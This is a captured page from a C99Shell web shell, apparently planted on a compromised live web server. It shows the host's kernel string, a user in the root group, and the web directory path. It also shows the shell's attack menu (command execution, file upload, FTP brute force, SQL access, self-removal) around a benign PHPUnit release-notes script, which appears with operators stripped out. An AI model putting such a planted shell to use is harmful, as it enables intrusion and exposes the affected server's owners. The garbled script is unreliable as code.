!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/qr.picotech.app/public_html/vendor/phpunit/php-code-coverage/build/scripts/   drwxr-xr-x
Free 23.54 GB of 117.98 GB (19.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     extract-release-notes.php (888 B)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/env php
<?php declare(strict_types=1);
if (
$argc !== 2) {
    print 
$argv[0] . ' <tag>' PHP_EOL;

    exit(
1);
}

$version       $argv[1];
$versionSeries explode('.'$version)[0] . '.' explode('.'$version)[1];

$file __DIR__ '/../../ChangeLog-' $versionSeries '.md';

if (!
is_file($file) || !is_readable($file)) {
    print 
$file ' cannot be read' PHP_EOL;

    exit(
1);
}

$buffer '';
$append false;

foreach (
file($file) as $line) {
    if (
str_starts_with($line'## [' $version ']')) {
        
$append true;

        continue;
    }

    if (
$append && (str_starts_with($line'## ') || str_starts_with($line'['))) {
        break;
    }

    if (
$append) {
        
$buffer .= $line;
    }
}

$buffer trim($buffer);

if (
$buffer === '') {
    print 
'Unable to extract release notes' PHP_EOL;

    exit(
1);
}

print 
$buffer PHP_EOL;

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0031 ]--